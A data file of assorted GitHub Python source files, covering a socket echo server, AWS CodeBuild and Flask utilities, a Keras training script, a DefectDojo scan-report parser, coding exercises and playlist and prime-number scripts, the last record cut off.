+{"seq_id":"3387264411","text":"import socketserver\n#多客服端通讯必须继承socketserver.BaseRequestHandler类\n# 1.sock.socket 用于传入请求的套接字对象\n# 2.sock.server_address 监听服务器的地址.比如元组(\"127.0.0.1\",80)\n# 3.sock.RequestHandlerClass 传递给服务器构造函数并由用户提供的请求处理程序类.\n# 4.sock.serve_forever() 处理无限的请求.\n# 5.sock.shutdown() 停止serve_forever()循环.\n# 6.sock.fileno() 返回服务器套接字的整数文件描述符.该方法可以有效的通过轮询操作(如select()函数)使用服务器实例.\nclass MyServer(socketserver.BaseRequestHandler):\n\n def handle(self):\n print(\"from conn:\",self.request)\n while True:\n data=self.request.recv(1024)\n if not data: break\n print(data)\n self.request.send(data.upper())\n\n\ns1=socketserver.ThreadingTCPServer((\"127.0.0.1\",8080),MyServer)\ns1.serve_forever()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"awuxina/www","sub_path":"网络编程和并发/多并发的远程执行命令/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15179826296","text":"import boto3\nimport json\nfrom json import JSONEncoder\nimport datetime\n\ncc_client = boto3.client('codecommit')\ncb_client = boto3.client('codebuild')\n\ndef lambda_handler(event, context):\n report_response = cb_client.batch_get_reports(reportArns=event['taskresult']['Build']['ReportArns'])\n reports = report_response['reports']\n for report in reports:\n if 'codeCoverageSummary' in report:\n response = cc_client.post_comment_for_pull_request(\n pullRequestId=event['detail']['pullRequestId'],\n repositoryName=event['detail']['repositoryNames'][0],\n beforeCommitId=event['detail']['destinationCommit'],\n afterCommitId=event['detail']['sourceCommit'],\n content=json.dumps(report['codeCoverageSummary'])\n )\n if 'testSummary' in report:\n response = cc_client.post_comment_for_pull_request(\n pullRequestId=event['detail']['pullRequestId'],\n repositoryName=event['detail']['repositoryNames'][0],\n beforeCommitId=event['detail']['destinationCommit'],\n afterCommitId=event['detail']['sourceCommit'],\n content=json.dumps(report['testSummary'])\n )\n return \"\"","repo_name":"richardhboyd/codebuild-samples","sub_path":"codebuild-webinar/functions/pr_updater/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"73469801641","text":"\ndef min_CAD_coins(money):\n \"\"\"\n 12. (5 points) Suppose that a cashier in Canada owes a customer some change and that the\n cashier only has coins ie. toonies, loonies, quarters, dimes, and nickels. Write a\n function that determines the minimum number of coins that the cashier can return. In\n particular, write a function min_CAD_coins(price,payment) that returns five numbers\n (t,l,q,d,n) that represent the smallest number of coins (toonies, loonies, quarters,\n dimes, and nickels) that add up to the amount owed to the customer (here price and\n payment are defined as in the previous question). Your program must first call the\n cad_cashier function, from question 11, to determine the amount of change that\n needs to be returned. Then before doing anything else, you may want to convert this\n amount entirely to cents (that selfhould be of type int). Once you have the total number\n of cents here are some hints on how to find the minimum number of coins.\n \"\"\"\n\n # Using greedy algo\n\n # Dictionary to represent number of coins to return\n coins =\t{\n 2: 0, # toonies\n 1: 0, # loonies\n 0.25: 0, # quarters\n 0.10: 0, # dimes\n 0.05: 0, # nickels\n }\n\n balance = 0\n count = 0\n\n for coin in coins:\n # How much of the money can be returned with this particular coin\n count = int(money//coin)\n coins[coin] = count\n balance = money%coin\n # if the decimal part of the division is 0, then no more checking need to be done.\n # otherwise substract the amount we covered with the bigger coin\n if(balance==0):\n break\n else:\n money = money-(count*coin)\n\n print(coins)\n return\n\nmin_CAD_coins(10.50)\nmin_CAD_coins(3.80)\n","repo_name":"justinjk007/Sandbox","sub_path":"python/cashier.py","file_name":"cashier.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22029905909","text":"\"\"\"API resources for general mailing list subscribers.\"\"\"\nimport logging\nimport os\n\nfrom webargs.flaskparser import use_kwargs\nfrom flask_restful import abort, Resource\n\nfrom registration.src.api import base\nfrom registration.src.api.utils import mailing_list\n\nLOG = logging.getLogger(__name__)\n\n\nclass SubscriberList(Resource):\n # pylint: disable=no-member, no-self-use\n \"\"\"Endpoint to add to a generic email list.\"\"\"\n @use_kwargs({\n 'email': base.SimilarKwargs.POST['email']\n })\n def post(self, email):\n \"\"\"Sends confirmation in a post req\n\n :param email: email to send to\n :type email: String\n :returns: email success or error\n : rtype : String\n \"\"\"\n response = mailing_list.add(email, os.environ['MAILCHIMP_SUBSCRIBER_LIST'])\n jsoned_response = response.json()\n\n request_did_error = response.status_code < 200 or response.status_code > 299\n if request_did_error:\n LOG.error('Failed to add {} to mailing list: {}'.format(email, jsoned_response)) # pylint: disable=logging-format-interpolation\n abort(\n jsoned_response.get('status'),\n status='failed',\n title=jsoned_response.get('title'),\n detail=jsoned_response.get('detail'),\n errors=jsoned_response.get('errors')\n )\n return {'status': 'success'}\n","repo_name":"CruzHacks/cruzhacks-2019-registration-service","sub_path":"services/registration/src/api/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28527404708","text":"#!/gpfs/home/mncui/soft/anaconda3/bin/python\nimport numpy as np\nimport pandas as pd\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import CuDNNLSTM\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom sklearn.cross_validation import cross_val_score\nfrom sklearn.cross_validation import KFold\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nimport matplotlib.pyplot as plt\nfrom keras.layers import Dropout\nlog = open('run.log','a')\n\n\ncalina = pd.read_table('symple.dat',header = None)\nx = calina.values[0:4000000,0:50]\n#calina = calina.values[:,0:25]\n#calinb = pd.rad_table('../pos10/symple.dat',header = None)\n#calinb = calinb.values[:,:]\n#calin = np.r_[calina,calinb]\ncaloua = pd.read_csv('chgcar.dat',header = None)\ny = calina.values[0:4000000,0]\nx_val = calina.values[4000001:,0:50]\ny_val = caloua.values[4000001:,0]\n#caloub = pd.rad_csv('../pos10/chgcar.dat',header = None)\n#caloub = calinb.values[:,:]\n#calou = np.r_[caloua,caloub]\n\nmodel = Sequential()\nmodel.add(Dropout(0.5, input_shape=(50,)))\nmodel.add(Dense(512,input_dim=50, init='normal', activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(512, init='normal', activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(512, init='normal', activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(512, init='normal', activation='relu'))\nmodel.add(Dropout(0.5))\n\nmodel.compile(loss='mean_squared_error',\n optimizer='adam',metrics=['accuracy'])\n#model.summary()\n\n# validation_split=0.9,\nhistory = model.fit(x,y,epochs=100,batch_size=200000,verbose=1,validation_data=(x_val,y_val))\nprint(history.history.keys())\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\n\nepochs = range(1, len(loss)+1)\n\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\nplt.savefig('loss.png')\nplt.clf()\n\naccuracy = history.history['acc']\nval_acc = history.history['val_acc']\n\nplt.plot(epochs, accuracy,'bo', label='Accuracy')\nplt.plot(epochs, val_acc,'b', label='Validation accuracy')\nplt.title('Training and validation accuracy')\nplt.xlabel('epochs')\nplt.ylabel('accuracy')\nplt.legend()\nplt.savefig('accuracy.png')\n","repo_name":"MengnanCui/VASP_scripts","sub_path":"4. Machine learning/keras.py","file_name":"keras.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"4852397290","text":"\"\"\"This file contains scripts that add emacs-like functionality not \r\nfound in Wing's internal emacs support layer.\r\n\r\nCopyright (c) 2005, Wingware All rights reserved.\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining\r\na copy of this software and associated documentation files (the\r\n\"Software\"), to deal in the Software without restriction, including\r\nwithout limitation the rights to use, copy, modify, merge, publish,\r\ndistribute, sublicense, and/or sell copies of the Software, and to\r\npermit persons to whom the Software is furnished to do so, subject to\r\nthe following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be\r\nincluded in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\r\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\r\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\r\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\r\nCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\r\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\r\nSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\"\"\"\r\n\r\nimport os\r\nimport wingapi\r\n\r\n# Scripts can be internationalize with gettext. Strings to be translated\r\n# are sent to _() as in the code below.\r\nimport gettext\r\n_ = gettext.translation('scripts_emacs_extensions', fallback = 1).ugettext\r\n\r\n# This special attribute is used so that the script manager can translate\r\n# also docstrings for the commands found here\r\n_i18n_module = 'scripts_emacs_extensions'\r\n\r\n######################################################################\r\ndef add_change_log_entry(user_name=None, email=None, changelog=None, \r\n changed_file=None, func=None,\r\n other_window=False, new_entry=False):\r\n \"\"\"Add a change log entry\"\"\"\r\n \r\n kItemDelimiter = '\\n * '\r\n kDateFormat = '%Y-%m-%d'\r\n kDefaultUserName = os.environ.get('USERNAME', os.environ.get('USER', 'Unknown Name'))\r\n kDefaultEmail = '<%s@%s>' % (os.environ.get('USER', 'unknown'), \r\n os.environ.get('HOSTNAME', 'localhost'))\r\n app = wingapi.gApplication\r\n \r\n doc = app.GetActiveDocument()\r\n curfile = None\r\n if doc is not None:\r\n filename = doc.GetFilename()\r\n if not filename.startswith('unknown:'):\r\n from wingutils import location # undocumented\r\n dirname, curfile = location.SplitPathUrl(filename)\r\n \r\n if user_name is None:\r\n user_name = kDefaultUserName\r\n if email is None:\r\n email = kDefaultEmail\r\n if changelog is None:\r\n proj = wingapi.gApplication.GetProject()\r\n changelog = proj.GetFilename()\r\n changelog = os.path.join(os.path.dirname(changelog), 'ChangeLog')\r\n if changed_file is None:\r\n doc = wingapi.gApplication.GetActiveDocument()\r\n changed_file = os.path.basename(doc.GetFilename())\r\n if func is None:\r\n ed = wingapi.gApplication.GetActiveEditor()\r\n scope_info = ed.GetSourceScope()\r\n func = '.'.join(scope_info[2:])\r\n \r\n import time\r\n stime = time.strftime(kDateFormat)\r\n header = \"%s %s %s\" % (stime, user_name, email)\r\n editor = app.OpenEditor(changelog, raise_window=True)\r\n if editor is None:\r\n return\r\n doc = editor.GetDocument()\r\n txt = doc.GetText()\r\n pos = txt.find(header)\r\n if pos == -1 or new_entry:\r\n doc.InsertChars(0, header + '\\n')\r\n pos = len(header) + 1\r\n doc.InsertChars(pos, '\\n\\n')\r\n else:\r\n pos += len(header) + 1\r\n\r\n if curfile is not None:\r\n item = kItemDelimiter + curfile\r\n if func is not None:\r\n item += ' (%s)' % func\r\n item += ': '\r\n doc.InsertChars(pos, item)\r\n editor.SetSelection(pos + len(item), pos + len(item))\r\n","repo_name":"raychorn/svn_Wing_IDE","sub_path":"scripts/Wing IDE 4.0/emacs-extensions.py","file_name":"emacs-extensions.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11172108441","text":"import json\nfrom datetime import datetime\n\nfrom dojo.models import Finding\n\n\nclass JFrogXrayUnifiedParser(object):\n \"\"\"JFrog Xray JSON reports\"\"\"\n\n def get_scan_types(self):\n return [\"JFrog Xray Unified Scan\"]\n\n def get_label_for_scan_types(self, scan_type):\n return scan_type\n\n def get_description_for_scan_types(self, scan_type):\n return \"Import Xray Unified (i.e. Xray version 3+) findings in JSON format.\"\n\n def get_findings(self, json_output, test):\n tree = json.load(json_output)\n return self.get_items(tree, test)\n\n def get_items(self, tree, test):\n items = []\n if \"rows\" in tree:\n vulnerabilityTree = tree[\"rows\"]\n\n for node in vulnerabilityTree:\n item = get_item(node, test)\n\n items.append(item)\n\n return items\n\n\ndef get_item(vulnerability, test):\n # Some items have multiple CVEs for some reason, so get the CVE with the highest CVSSv3 score.\n # Note: the xray v2 importer just took the first CVE in the list, that\n # doesn't seem ideal though\n highestCvssV3Index = 0\n highestCvssV3Score = 0\n\n for thisCveIndex in range(0, len(vulnerability[\"cves\"]) - 1):\n # not all cves have cvssv3 scores, so skip these. If no v3 scores,\n # we'll default to index 0\n if \"cvss_v3_score\" in vulnerability[\"cves\"][thisCveIndex]:\n thisCvssV3Score = vulnerability[\"cves\"][thisCveIndex][\n \"cvss_v3_score\"\n ]\n if thisCvssV3Score > highestCvssV3Score:\n highestCvssV3Index = thisCveIndex\n highestCvssV3Score = thisCvssV3Score\n\n # Following the CVSS Scoring per https://nvd.nist.gov/vuln-metrics/cvss\n if \"severity\" in vulnerability:\n if vulnerability[\"severity\"] == \"Unknown\":\n severity = \"Info\"\n else:\n severity = vulnerability[\"severity\"].title()\n # TODO: Needs UNKNOWN new status in the model.\n else:\n severity = \"Info\"\n\n cveIndex = highestCvssV3Index\n\n vulnerability_id = None\n cvss_v3 = \"No CVSS v3 score.\" # for justification field\n cvssv3 = None # for actual cvssv3 field\n cvss_v2 = \"No CVSS v2 score.\"\n mitigation = None\n extra_desc = \"\"\n\n cves = vulnerability.get(\"cves\", [])\n if len(cves) > 0:\n worstCve = cves[cveIndex]\n if \"cve\" in cves[cveIndex]:\n vulnerability_id = worstCve[\"cve\"]\n if \"cvss_v3_vector\" in worstCve:\n cvss_v3 = worstCve[\"cvss_v3_vector\"]\n cvssv3 = cvss_v3\n if \"cvss_v2_vector\" in worstCve:\n cvss_v2 = worstCve[\"cvss_v2_vector\"]\n\n if (\n \"fixed_versions\" in vulnerability\n and len(vulnerability[\"fixed_versions\"]) > 0\n ):\n mitigation = \"Versions containing a fix:\\n\"\n mitigation = mitigation + \"\\n\".join(vulnerability[\"fixed_versions\"])\n\n if (\n \"external_advisory_source\" in vulnerability\n and \"external_advisory_severity\" in vulnerability\n ):\n extra_desc = (\n vulnerability[\"external_advisory_source\"]\n + \": \"\n + vulnerability[\"external_advisory_severity\"]\n )\n\n if vulnerability[\"issue_id\"]:\n title = vulnerability[\"issue_id\"] + \" - \" + vulnerability[\"summary\"]\n else:\n title = vulnerability[\"summary\"]\n\n references = \"\\n\".join(vulnerability[\"references\"])\n\n scan_time = datetime.strptime(\n vulnerability[\"artifact_scan_time\"], \"%Y-%m-%dT%H:%M:%S%z\"\n )\n\n # component has several parts separated by colons. Last part is the\n # version, everything else is the name\n splitComponent = vulnerability[\"vulnerable_component\"].split(\":\")\n component_name = \":\".join(splitComponent[:-1])\n component_version = splitComponent[-1:][0]\n # remove package type from component name\n component_name = component_name.split(\"://\", 1)[1]\n\n tags = [\"packagetype_\" + vulnerability[\"package_type\"]]\n\n # create the finding object\n finding = Finding(\n title=title,\n test=test,\n severity=severity,\n description=(\n vulnerability[\"description\"] + \"\\n\\n\" + extra_desc\n ).strip(),\n mitigation=mitigation,\n component_name=component_name,\n component_version=component_version,\n file_path=vulnerability[\"path\"],\n severity_justification=\"CVSS v3 base score: {}\\nCVSS v2 base score: {}\".format(\n cvss_v3, cvss_v2\n ),\n static_finding=True,\n dynamic_finding=False,\n references=references,\n impact=severity,\n cvssv3=cvssv3,\n date=scan_time,\n unique_id_from_tool=vulnerability[\"issue_id\"],\n tags=tags,\n )\n\n if vulnerability_id:\n finding.unsaved_vulnerability_ids = [vulnerability_id]\n\n return finding\n","repo_name":"DefectDojo/django-DefectDojo","sub_path":"dojo/tools/jfrog_xray_unified/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","stars":3128,"dataset":"github-code","pt":"18"} +{"seq_id":"28319510653","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 22 09:50:02 2019\n\n@author: ngochung\n\"\"\"\nimport string\nstring.hexdigits\nstring.ascii_uppercase\nreplacements=(('A','4'),('E','3'),('G','6'),('I','1'),('O','0'),('S','5'),('Z','2'))\nmy_string=input('nhap chuoi o day:') \nnew_string=my_string.upper()\nif 1<=len(my_string)<=100:\n for old,new in replacements:\n new_string=new_string.replace(old,new)\nelse:\n False\nprint(new_string)","repo_name":"NNH2512/paiza","sub_path":"changestring.py","file_name":"changestring.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27243849594","text":"from brein import SlangenBrein\nimport random\n\nclass Soetkin(SlangenBrein):\n \n @classmethod\n def uiterlijk(cls):\n return {\n \"apiversion\": \"1\",\n \"author\": \"soetkin\",\n \"color\": \"#FFC0CB\",\n \"head\": \"safe\",\n \"tail\": \"round-bum\",\n }\n\n def bereken_waarde_voor_richting(self, richting):\n if self.is_geblokkeerd(richting):\n return -1000\n \n # soetkin kiest willekeurig \n return random.randint(0, 100)","repo_name":"goes/battlesnake-nl","sub_path":"src/slangen/soetkin.py","file_name":"soetkin.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12582047561","text":"# @author: Gautam Patel\n# Problem Description URL: https://www.hackerrank.com/challenges/flatland-space-stations/problem\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the flatlandSpaceStations function below.\ndef flatlandSpaceStations(n, c):\n c_len = len(c)\n c.sort()\n max_d = c[0]\n for i in range(1, c_len):\n #print('{} {}'.format(i, max_d))\n d = (c[i]+c[i-1])//2\n max_d = (d-c[i-1] if d-c[i-1] > max_d else max_d)\n max_d = (c[i]-d-1 if c[i]-d-1 > max_d else max_d)\n if n-c[c_len-1]-1 > max_d:\n max_d = n-c[c_len-1]-1\n return max_d\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n nm = input().split()\n\n n = int(nm[0])\n\n m = int(nm[1])\n\n c = list(map(int, input().rstrip().split()))\n\n result = flatlandSpaceStations(n, c)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"gautambp/HackerRank","sub_path":"Master/python3/flatland-space-stations.py","file_name":"flatland-space-stations.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33652306537","text":"# -*- coding: utf8 -*-\n\nfrom logging import error\n\n# TODO REMOVE UTILITY\nfrom os.path import join\n\nfrom utility.os_interface import write_file_data, read_file_data\nfrom utility.path_str import get_relative_path\n\n\nclass playlist_wpl:\n def __init__(self):\n pass\n\n # filter src path\n def __get_new_track_path(self, old_track_path):\n old_track_path = old_track_path.split('\"')[1].replace(\"D:\\Musik\", \"\").replace(\"..\", \"\").replace('\\\\', \"/\")\n return \"/home/christian/Musik\" + old_track_path\n\n def get_files(self, path, playlist_name):\n\n if \".wpl\" not in playlist_name[-4:]:\n error(\"wrong playlist name\", playlist_name)\n return None\n\n old_data = read_file_data(path, playlist_name)\n if old_data is None:\n error(\"empty playlist \" + playlist_name)\n return None\n\n tracks_str = old_data.split(\"seq\")\n tracks_str.pop()\n\n if (len(tracks_str) is 2):\n tracks = tracks_str[1].split(\"']\n backlog.append(tag)\n return depth\n\n # descend hierarchy\n # close xml tag\n def __step_down(self, new_data, depth, backlog):\n tag = backlog.pop()\n new_data += [depth * ' ' + '']\n return depth - 1\n\n # write data of one track\n def __write_track(self, new_data, track_path, depth, backlog):\n depth = self.__step_up(new_data, 'track', depth, backlog)\n depth = self.__step_up(new_data, 'location', depth, backlog)\n\n new_data += [(depth + 1) * ' ' + 'file://' + track_path]\n\n depth = self.__step_down(new_data, depth, backlog)\n depth = self.__step_down(new_data, depth, backlog)\n\n def generate_playlist(self, album_path, playlist_path, playlist_name, files):\n # initialize hierarchy\n depth = 0\n backlog = []\n\n # begin xml document\n new_data = ['']\n new_data += ['']\n depth = self.__step_up(new_data, 'trackList', depth, backlog)\n\n # write xml data\n for file in files:\n self.__write_track(new_data, album_path + '/' + file, depth, backlog)\n\n # close xml document\n depth = self.__step_down(new_data, depth, backlog)\n new_data += ['']\n\n write_file_data(playlist_path, playlist_name, data=\"\\n\".join(new_data))\n\n\ndef generate_playlist_m3u(album_path, playlist_path, playlist_name, files):\n album_path = get_relative_path(playlist_path, album_path)\n files = [join(album_path, file) for file in files]\n\n write_file_data(playlist_path, playlist_name, data=\"\\n\".join(files).replace(\"/\", '\\\\'))\n\n\n# GENERATE the playlist\ndef generate_playlist(album_path, playlist_path, playlist_name, files):\n if playlist_name.endswith('.m3u') or playlist_name.endswith('.pls'):\n generate_playlist_m3u(album_path, playlist_path, playlist_name, files)\n\n elif playlist_name.endswith('.xspf'):\n playlist_xspf().generate_playlist(album_path, playlist_path, playlist_name, files)\n","repo_name":"ChsHub/music_file_suite","sub_path":"src/meta/songs/playlists.py","file_name":"playlists.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18180448733","text":"from random import randint\nv = []\nmenor = 0\nindice = 0\n\nfor i in range(10):\n v.append(randint(1,50))\nprint(\"Antes >>\",v)\n\n#Selection Sort\nfor j in range(10):\n for i in range(indice,10):\n if v[menor] > v[i]:\n menor = i\n if i == 9:\n v[indice],v[menor] = v[menor],v[indice]\n indice += 1\n menor = indice\nprint(\"Depois >>\",v)\n\n'''\nv.sort()\n'''","repo_name":"PabloHenrique/AulasPython-Fatec","sub_path":"Exercícios/Microinformática/Termo I/Lista 06/exe07.py","file_name":"exe07.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"19231967052","text":"import numpy as np\nfrom tqdm import tqdm\n\ndef get_primes(n, primes=[2]):\n\n if n < len(primes):\n return primes\n\n m = primes[-1]\n\n while len(primes) < n:\n m += 1\n is_prime = True\n for prime in primes:\n if m % prime == 0:\n is_prime = False\n break\n if prime > np.sqrt(m):\n break\n if is_prime == True:\n primes.append(m)\n\n return primes\n\n\n","repo_name":"Gregory-Eales/project-euler","sub_path":"Python-Solutions/prime_gen.py","file_name":"prime_gen.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25119962784","text":"#!/usr/bin/python\n# -*- coding: utf-8\n# DataBase for IceSite\nimport my\nimport re\nfrom datetime import datetime\n\n\"\"\" Условия запроса \"\"\"\ndef qw_where(postdata,prefix=\"\",repq={},repf={}):\n query=[]\n if prefix!=\"\":\n prefix=prefix+\".\"\n for key,val in postdata.items():\n _key=key\n _prefix=prefix\n _ap=\"`\"\n if repq.has_key(key):\n query.append( repq[key][val[\"value\"]])\n continue\n if repf.has_key(key):\n _key=repf[key][0]\n _prefix=\"\"\n _ap=\"\"\n if repf[key][1]!=None:\n val['mod']=repf[key][1]\n if val[\"mod\"]==None:\n val[\"mod\"]=\"=\"\n if val[\"mod\"] in [\"IN\",\"NOT IN\"]:\n value=\"(%s)\" % val[\"value\"]\n elif val[\"mod\"] in [\"LIKE\"]:\n value=\"('%\"+val[\"value\"]+\"%')\"\n elif re.match(\"^-*[0-9\\.]+$\",val['value']):\n value=\"%s\" % val[\"value\"]\n else:\n value=\"'%s'\" % val[\"value\"]\n query.append(\"%s%s%s%s %s %s\" % (_prefix,_ap,_key,_ap,val[\"mod\"],value))\n return query\n\n\"\"\" Список полей с префиксом и исключением \"\"\"\ndef qw_get_fieldlist(prefix,fieldsorder,without,add=[]):\n if prefix!=\"\":\n prefix+=\".\"\n res=[]\n for f in fieldsorder:\n if not f in without:\n res.append(prefix+f)\n return res+add\n\ndef qw_where_trsc(data_hd,data_ct):\n #print data_hd\n repq_hd={ \"isegais\": {\"0\":\"egais_sign=''\",\"1\":\"egais_sign<>''\"},\\\n \"isdiscountcard\":{\"0\":\"discount_card=''\",\"1\":\"discount_card<>''\"},\\\n \"isbonuscard\":{\"0\":\"bonus_card=''\",\"1\":\"bonus_card<>''\"},\\\n \"iserror\":{\"0\":\"errors=''\",\"1\":\"errors<>''\"},\\\n \"type_pay\":{\"0\":\"pay_bnal=0\",\"1\":\"pay_bnal<>0\",\"2\":\"pay_bnal<>0 and pay_nal<>0\"},\\\n }\n repf_hd= { \"date1\":[\"hd.date\",\">=\"],\\\n \"date2\":[\"hd.date\",\"<=\"],\\\n \"time1\":[\"hd.time\",\">=\"],\\\n \"time2\":[\"hd.time\",\"<=\"],\\\n \"summa_wod\":[\"hd.summa-hd.discount_sum-hd.bonus_discount\",None],\\\n }\n repq_ct={ \"limitprice\": {\"0\":\"p_maxprice=0 and p_minprice=0\",\"1\":\"(p_maxprice<>0 or p_minprice<>0)\"},\\\n \"ch_cena\":{\"0\":\"p_cena=paramf1\",\"1\":\"p_cena<>paramf1\"},\\\n }\n repf_ct= { \"ct_bonus\":[\"(ct.bonus/ct.paramf3)*100\",None],\\\n \"ct_bonus_discount\":[\"(ct.bonus_discount/ct.paramf3)*100\",None],\n \"discount\":[\"(ct.discount/ct.paramf3)*100\",None],\n }\n\n hd_query=qw_where(data_hd,\"hd\",repq_hd,repf_hd)\n ct_query=qw_where(data_ct,\"ct\",repq_ct,repf_ct)\n\n thd_query=\" and \".join(hd_query)\n tct_query=\" and \".join(ct_query)\n if tct_query!=\"\":\n tct_query=\" and \"+tct_query\n q_where = \"where hd.idreg=ct.idreg and hd.idplace=ct.idplace and hd.nkassa=ct.nkassa and hd.id=ct.idhd \"\n q_order = \" order by hd.idreg, hd.idplace, hd.nkassa, hd.date, hd.time, ct.id\"\n q = q_where+\" and \"+thd_query+tct_query+q_order\n return q\n\ndef qw_query_trsc_short(hd,ct,fields,fields_calc):\n add=[]\n for k,v in fields_calc.items():\n add.append(\"(%s) as %s\" % (v,k))\n f=\",\".join(fields+add)\n w=qw_where_trsc(hd,ct)\n return \"select %s from tb_trsc_hd as hd,tb_trsc_ct as ct %s\" % (f,w)\n\ndef qw_query_trsc_full(hd,ct,fields,fields_calc):\n add=[]\n for k,v in fields_calc.items():\n add.append(\"(%s) as %s\" % (v,k))\n f=\",\".join(fields+add)\n w=qw_where_trsc(hd,ct)\n sub = \"select distinct hd.idreg,hd.idplace,hd.nkassa,hd.id from tb_trsc_hd as hd,tb_trsc_ct as ct %s\" % (w)\n q = \"select %s from (%s) as hdd,tb_trsc_hd as hd,tb_trsc_ct as ct \\\n where hdd.idreg=hd.idreg and hdd.idplace=hd.idplace and hdd.nkassa=hd.nkassa and hdd.id=hd.id and\\\n hd.idreg=ct.idreg and hd.idplace=ct.idplace and hd.nkassa=ct.nkassa and hd.id=ct.idhd\" % (f,sub)\n return q\n\n","repo_name":"redeyser/IceSite","sub_path":"qIceSite.py","file_name":"qIceSite.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25522031629","text":"import sys\n\n\ndef giveBooks():\n global N, M, want, given\n\n cnt = 0\n\n for left, right in want:\n for book in range(left, right+1):\n if given[book] == 0:\n given[book] = 1\n cnt += 1\n break\n\n print(cnt)\n\n\nif __name__ == '__main__':\n TC = int(input())\n for T in range(TC):\n N, M = map(int, input().split())\n want = [0 for _ in range(M)]\n given = [0 for _ in range(N+1)]\n\n for stu in range(M):\n a, b = map(int, sys.stdin.readline().split())\n want[stu] = (a, b)\n\n want.sort(key=lambda item: item[1])\n giveBooks()\n","repo_name":"jjungyeun/AlgorithmStudy2021","sub_path":"Baekjoon/2105/9576.py","file_name":"9576.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70075356202","text":"import os\n\n# Function to check if a number is prime\ndef is_prime(num):\n if num <= 1:\n return False\n if num <= 3:\n return True\n if num % 2 == 0 or num % 3 == 0:\n return False\n i = 5\n while i * i <= num:\n if num % i == 0 or num % (i + 2) == 0:\n return False\n i += 6\n return True\n\n# Check if the file 'primeoutputgpt.txt' exists\nif not os.path.isfile('primeoutputgpt.txt'):\n # If the file doesn't exist, create it and append '2 3' to it\n with open('primeoutputgpt.txt', 'w') as file:\n file.write('2 3\\n')\n\n# Read the last number from the file 'primeoutputgpt.txt' into the variable 'last_number'\nwith open('primeoutputgpt.txt', 'r') as file:\n numbers = file.read().split()\n last_number = int(numbers[-1])\n\n# Start an infinite loop\nwhile True:\n last_number += 1\n\n # Check if (last_number % 6) is equal to 1 or 5\n if (last_number % 6) == 1 or (last_number % 6) == 5:\n # Define a function to check if the number is prime by checking against known primes\n def check_known_prime(number):\n with open('primeoutputgpt.txt', 'r') as file:\n primes = [int(x) for x in file.read().split()]\n for prime in primes:\n if prime > number // 2:\n break\n if number % prime == 0:\n return False\n return True\n\n # Check if last_number is prime using check_known_prime\n if check_known_prime(last_number):\n # Append last_number to 'primeoutputgpt.txt'\n with open('primeoutputgpt.txt', 'a') as file:\n file.write(f' {last_number}')\n\n # Restart the 